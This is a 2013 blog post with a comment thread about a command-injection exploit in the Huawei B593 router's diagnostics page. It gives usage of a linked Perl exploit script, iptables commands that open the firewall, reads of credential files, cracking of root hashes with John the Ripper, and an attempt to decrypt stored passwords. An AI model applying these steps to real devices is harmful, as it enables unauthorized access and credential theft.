Exploit: Running commands on B593 shell
Tuesday, November 19. 2013
Mr. Ronkainen at http://blog.asiantuntijakaveri.fi/ has done some really good research on Huawei B593 web interface. He discovered that the ping-command in diagnostics runs any command you'd like to. Really! Any command.
I being a lazy person didn't want to use cURL to do all the hacking, that's way too much work for me. So, I did a quick hack for a Perl-script to do the same thing. Get my script from http://opensource.hqcodeshop.com/Huawei%20B593/exploit/B593cmd.pl
To use my script, you'll need 3 parameters
- The host name or IP-address of your router, typically it is 192.168.1.1
- The admin password, typically it is admin
- The command to run. Anything you want.
Example command B593cmd.pl 192.168.1.1 admin "iptables -nL INPUT" will yield:
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP all -- 0.0.0.0/0 0.0.0.0/0 state INVALID
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
INPUT_DOSFLT all -- 0.0.0.0/0 0.0.0.0/0
INPUT_SERVICE_ACL all -- 0.0.0.0/0 0.0.0.0/0
INPUT_URLFLT all -- 0.0.0.0/0 0.0.0.0/0
INPUT_SERVICE all -- 0.0.0.0/0 0.0.0.0/0
INPUT_FIREWALL all -- 0.0.0.0/0 0.0.0.0/0
In my box the SSHd does not work. No matter what I do, it fails to open a prompt. I'll continue investigating the thing to see if it yields with a bigger hammer or something.
Happy hacking!
FromHungary on :
Big thanks for the script.
Now a little magic, to reach the sshd/telnetd:
./B593cmd.pl 192.168.1.1 password "iptables -F INPUT_SERVICE"
./B593cmd.pl 192.168.1.1 password "iptables -X INPUT_SERVICE"
then you have to wait a littlebit, and then:
telnet 192.168.1.1
"
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
Login:
"
But I cannot login, tried admin/admin, root/root and so on...
If I using ssh and using admin as password:
ssh admin@192.168.1.1 -s /bin/sh
admin@192.168.1.1's password:
subsystem request failed on channel 0
Jari Turkia on :
lo on :
bob on :
having error like this:
Need B593 hostname or IP, admin password and a command to execute on remote end! at B593cmd.pl line 104.
Jari Turkia on :
To use my script, you'll need 3 parameters:
1) The host name or IP-address of your router, typically it is 192.168.1.1
2) The admin password, typically it is admin
3) The command to run. Anything you want.
Jari Turkia on :
http://blog.hqcodeshop.fi/archives/127-Huawei-B593-different-models.html
bob on :
Jari Turkia on :
bob on :
Jari Turkia on :
bob on :
Jari Turkia on :
bob on :
here is what inside system
http://prntscr.com/2i30k0
modem is locked on a carrier they only give access on a user account that no access on admin web-GUI.
Jari Turkia on :
bob on :
Jari Turkia on :
bob on :
Jari Turkia on :
bob on :
Jari Turkia on :
bob on :
Jari Turkia on :
Lance Fortalez on :
Jari Turkia on :
1) you confirm, that you are able to run commands in the B593 with the existing exploit tool
2) I modify the existing tool to be able to set a known admin-password
3) you test it, and report back with the results
4) upon success, I distribute the new version to everybody
Lance on :
UserInfoInstance Username="admin" TmpEmail="" Email="" RemindChangePwdEnable="1" Pwdchanged="0" Userpassword="Eg6MEbCD3U98wE5F3HAXCbQ/sLoekvjMUtnqw3SXK+vb7wHBhUFCJQ==" InstanceID="1"/> - -
Jari Turkia on :
bob on :
i have access now admin page, i try to run your script but i got error with this ==>Weird script path! at B593cmd.pl line 110.
i use command
perl -T B593cmd.pl 192.168.1.1 admin -nL INPUT"
Jari Turkia on :
Try this: change the line 110 to contain following:
die "Weird script path: " . dirname(abs_path($0)) if (dirname(abs_path($0)) !~ m:^(/.+)$:);
The idea is to un-taint the variable. It is a simple check if the directory where the script is located has any sanity in it.
bo on :
here is the output when i run again the command with the change you said
Weird script path: C:\Users\xxxx\Downloads at B593cmd.pl line 111.
Jari Turkia on :
die "Weird script path: " . dirname(abs_path($0)) if (dirname(abs_path($0)) !~ m:^([\\/].+)$:);
bob on :
Weird script path: C:\Users\xxxx\Downloads at B593cmd.pl line 112.
line is increasing since i just disable the orig command i try to run on cygwin but having more error
$ perl -cT B593cmd.pl 192.168.5.1 admin "iptables -nL INPUT"
Can't locate LWP/UserAgent.pm in @INC (@INC contains: /usr/lib/perl5/site_perl/5.14/x86_64-cygwin-threads /usr/lib/perl5/site_perl/5.14 /usr/lib/perl5/vendor_perl/5.14/x86_64-cygwin-threads /usr/lib/perl5/vendor_perl/5.14 /usr/lib/perl5/5.14/x86_64-cygwin-threads /usr/lib/perl5/5.14) at B593cmd.pl line 25.
BEGIN failed--compilation aborted at B593cmd.pl line 25.
Jari Turkia on :
bob on :
Permission denied, please try again.
using the admin password.
Jari Turkia on :
bob on :
Jari Turkia on :
abu on :
It is possible to change the admin password in web-gui even you dont have access to it, can you elaborate to me the steps how to change the password in the web-gui for the admin so that i can change it for a know one. I dont have access to it only the user account. Thnx!
abu on :
can you help me change the password of web-gui admin access to a known value. based on your conversation with jari it seems to me you enable to change the admin password of web-gui.
thnx
Jari Turkia on :
Bilbo Beutlin on :
"-T" is on the #! line, it must also be used on the command line at B593cmd.pl line 1
Eliminated the -T in your scrip and tried to execute the script again: perl B593cmd.pl 192.168.1.1 admin "iptables -nL INPUT" . Using Kali-Linux
But NO yield ... mhhh Any idea?
Bilbo Beutlin on :
No error this time, but no yield.
Tried ./B593cmd.pl 192.168.1.1 admin-password "cat /var/sshusers.cfg". No output again.
Mhh? Any ideas?
Jari Turkia on :
Bilbo Beutlin on :
So the exploit should work. The crazy thing is, that the command
./B593cmd.pl -the-IP- -the-admin-Pwd- "iptables -I INPUT -i br0 -j ACCEPT"
works perfectly. When I execute it, all ports are opened (before closed). nmap tells me, that all ports are opened after executing the command.
But there is no output, when I try ./B593cmd.pl 192.168.1.1 admin-password "iptables -nl INPUT" or ./B593cmd.pl 192.168.1.1 admin-password "cat /var/sshusers.cfg".
Any ideas?
Jari Turkia on :
Some troubleshooting:
- does the exploit-command ever emit any output? example: "ls -l /var/"
- if yes, does the file /var/sshusers.cfg exist?
- if yes, what are the file permissions?
- are you able to "cat /var/curcfg.xml" ?
Bilbo Beutlin on :
No output at:
./B593cmd.pl 192.168.1.1 password "ls -l /var/"
No output at:
./B593cmd.pl 192.168.1.1 password "cat /var/curcfg.xml"
The only thing that works is: ./B593cmd.pl 192.168.1.1 password "iptables -I INPUT -i br0 -j ACCEPT"
My router has default credential for WebGUI and CLI. Admin/Admin and User/User.
But the procedere should be:
1. Open all ports: ./B593cmd.pl 192.168.1.1 password "iptables -I INPUT -i br0 -j ACCEPT"
2. Then ./B593cmd.pl 192.168.1.1 password "cat /var/sshusers.cfg" to search for credentials. But the command does not emit any output. But /var/sshusers.cfg is definitely here. Checked it by the cli admin/admin account using the command: ssh admin@192.168.1.1 /bin/sh with passord admin.
Any ideas why there is no output?
My var/sshusers.cfg is that:
admin:admin:0
user:user:1
There is also an interesting var/passwd-file:
0:NjBbXtb1phwNM:0:0:root:/home:/bin/sh
nobody:x:99:99:Nobody:/:/sbin/nologin
test:nTRs0cp4mNaF2:0:0:ftp user:/mnt:/bin/sh
That means, there is a root-Account 0 (Zero) with an encrypted password "NjBbXtb1phwNM". An nobody-account (the x marks, that there should be a shadow-file, where the password ist stored). And a test-Account (I have made this).
But the interesting one ist the 0-Account. How to decrypt?
Jari Turkia on :
Can you break down the exploiting into manually done pieces? See http://blog.asiantuntijakaveri.fi/2013/08/gaining-root-shell-on-huawei-b593-4g.html
The idea is to first login and then run the ping-command. Especially the part "Fetch results and do little cleanup" is very important. If your firmware emits anything at all, I'm sure my Perl-code reformats it differently than your box outputs it. There must be something non-standard about it.
FromHungary on :
Here is the software: http://www.openwall.com/john/
I created a file with:
"
0:NjBbXtb1phwNM:0:0:root:/home:/bin/sh
nobody:x:99:99:Nobody:/:/sbin/nologin
test:nTRs0cp4mNaF2:0:0:ftp user:/mnt:/bin/sh
"
and saved to whatever.txt
and then running the command:
john whatever.txt
Loaded 2 password hashes with 2 different salts (Traditional DES [128/128 BS SSE2])
test (test)
root (0)
guesses: 2 time: 0:00:00:00 100% (1) c/s: 42666 trying: 0 - oot
Use the "--show" option to display all of the cracked passwords reliably
So:
first pass: root
second: test
Jari Turkia on :
If we could decrypt the curcfg.xml passwords, then we'd had something more usable at hand.
asiantuntijakaveri on :
I think encryption key is stored in beginning of base64 encoded string and rest of it is actual encrypted password we want to decrypt. Anyone willing to give it try? Decrypted WEP keys below for example are 1111111111111, 2222222222222, 3333333333333 and 4444444444444 as far as I know.
UserInfoInstance InstanceID="1" Username="admin" Userpassword="sBupvz7E012INt/dTTUhe7ZxY7u595HFqKSjaD9dXlr8FcWhwNs8rV==" IsChanged="0"
UserInfoInstance InstanceID="2" Username="user" Userpassword="zm92Ml3y8OsV/hp8pzRwoaaqlzC/6LhAb2wYr0hQr7/YG6u7p9NLBm==" IsChanged="0"/
UserInfoInstance InstanceID="1" Username="admin" Userpassword="zm92Ml3y8Ot3pa9NVzFSz2Hf4f2ljTzi5H3HIDxu8gj/9D+UK6vm/F==" Userlevel="0"/
UserInfoInstance InstanceID="2" Username="user" Userpassword="zm92Ml3y8Ov9Iqkb0gOrtrZc39K3CFO147BRwKe+uza5JSwJms0X32==" Userlevel="1"/
WEPKeyInstance InstanceID="1" WEPKey="TFdCd0lWY046T4GMxQv1Lm0fac0tI5EGwg=="/
WEPKeyInstance InstanceID="2" WEPKey="TFdCd0lWY046UV4q9mnrFj4DbwtpZCDxKw=="/
WEPKeyInstance InstanceID="3" WEPKey="TFdCd0lWY0464uY1puBJm5oGFXR50aQ+zg=="/
WEPKeyInstance InstanceID="4" WEPKey="TFdCd0lWY046AvBxtNbagTWFMkIfmBZwlg=="/
Jari Turkia on :
Jari Turkia on :
I gave your data a go.
Given the 1st: TFdCd0lWY046T4GMxQv1Lm0fac0tI5EGwg==
It Base64 decodes into following hex:
4c5742774956634e3a4f818cc50bf52e6d1f69cd2d239106c2
Notice how 3a is the last byte matching in each one of those. It is a : character.
So, what we effectively have is a 8 byte ASCII-string of LWBwIVcN, a : and 16 bytes of encrypted data. Given the initial value of 13 bytes of unencrypted data, a 64-bit block cipher is guaranteed to produce two blocks, aka. 128-bits, aka. 16 bytes.
What I'm seeing there is a IV and encrypted data. Not the encryption key as you suggested. Btw. I tried that 'HuaweiDeItmsIsVeryGood', and that's not it.
asiantuntijakaveri on :
Jari Turkia on :
However, I don't think the encryption is RSA. The rsa_pkcs1_decrypt is not likely to be used for passwords. That type of encryption is public/private-key stuff and doesn't work with simple encryption keys. You'd really need a set of keys for that to function. My hunch is, that they're still using 3-DES for passwords.
If I'm wrong and they actually are using that, then we'd need both keys, private and public.
asiantuntijakaveri on :
Copy-pasting long (SP100+ style) admin password from X_Web -> X_Cli changed SSH password to same as web management uses.
Copy-pasting short crypted password from FTP user (with 9th char ":") to X_Web changed web management password to that one.
Copy-pasting long (SP100+) password to FTP section of CurCfg does not decode it, base64 encoded string ends up as-is in /var/ftp/ftppassword file.
What does happen is debug message sent to serial console saying:
Data_DbDecrypt input[8] not ':'
Data_ChkAndDecrypt error1
So it's exactly like you said: Old format passwords are accepted and decrypted (to some extent, running Polkomtel SP103) and ":" which is 8th char in old style base64 encoded string is separator.
Tried to compile ltrace, but after finally getting required cross-compile bits working turned out it's not very mips-friendly (i.e. not compatible at all). Found some comments that very old versions predating ltrace rewrite might work better. Will check this later.
I also dumped /proc/kcore (2GB), haven't had time to look much into that. I did spot plaintext SSH user password, 0x00, plaintext SSH admin password, 0x00 and then string "44Y5TD934080042O" followed by again 0x00.
Below from my device if any of those look like suitable encryption key for these.
SSH admin:
zm92Ml3y8Ot3pa9NVzFSz2Hf4f2ljTzi5H3HIDxu8gj/9D+UK6vm/G==
Plaintext: EF809C19
SSH user:
zm92Ml3y8Ov9Iqkb0gOrtrZc39K3CFO147BRwKe+uza5JSwJms0X3w==
Plaintext: 9D16E9A4
Flash partition with plaintext webadmin and WPA key also contain:
N4Y5TD9340800425 (serial of device), 021PCR5T34000983 (probably another serial, revision id or something) and hex string 0xe8 0xcd 0x2d 0x72 0x15 0xcf. I have access to two more of these Vodafone branded units to compare with. What I'd like to try at least is to check if password hash taken from one device to another decodes correctly or if they are per-unit. That would give hint if key is stored in one of binaries or somewhere in flash.
Jari Turkia on :
Note how your encrypted passwords have the 8 byte initialization vector in front. That's exactly how most implementations operate.
The key is still missing.
Sean Nienbar on :
Jari Turkia on :
By looking at the code, the only way that error message can be emitted, is that your client computer can not successfully access the B593. The success is mesured by a HTTP-status code of 200. In your case that does not happen, either the client cannot access the router (a timeout) or the web GUI responds with an error code (perhaps a redirect).
Btw. what are you trying to accomplish? SSH-access?
Sean Nienbar on :
Jari Turkia on :
ch053n on :
Just confirming that running elisa sp055 exploit still works.
Gonna keep on reading about the ssh access...
Thanks you!
Jari Turkia on :
"I share, because I care."
kaity on :
Jari Turkia on :
Btw. which MAC are you referring to? WiFi or Ethernet?
jun on :
I have Huawei B593s-931, November firmware. This one is very hard to unlock or upgrade firmware cause its like it has anti upgrade or downgrade that the firmware blocks.
Please let me know how to run your exploit.
GUI cannot use admin login details. Only user details can log into it. Also it is locked with single operator. I tried using DC unlocker but cannot be detected even following the tutorials from DC unlocker. Is there a way to enable the USB mode for this modem? I tried using USB cable to PC but cannot be detected by the PC. Maybe there is a way to enable USB mode. I tried googling on USB mode. They said that press and hold power+WPS until the status LED is green. But I keep holding about 30 minutes but unable to change to USB mode.
Thanks for your help. My email add is jun101577@yahoo.com
Jari Turkia on :
luke on :
I have 593-s22, I can run the exploit and I can login as admin on the web interface.
BUT the admin web interface password does not work for SSH.
Anything else I can do?
rafaela on :
rafaela on :
Jari Turkia on :
Jari Turkia on :
Huawei seems to have enough energy to address those simple flaws and they have been fixed.
Btw. July of which year?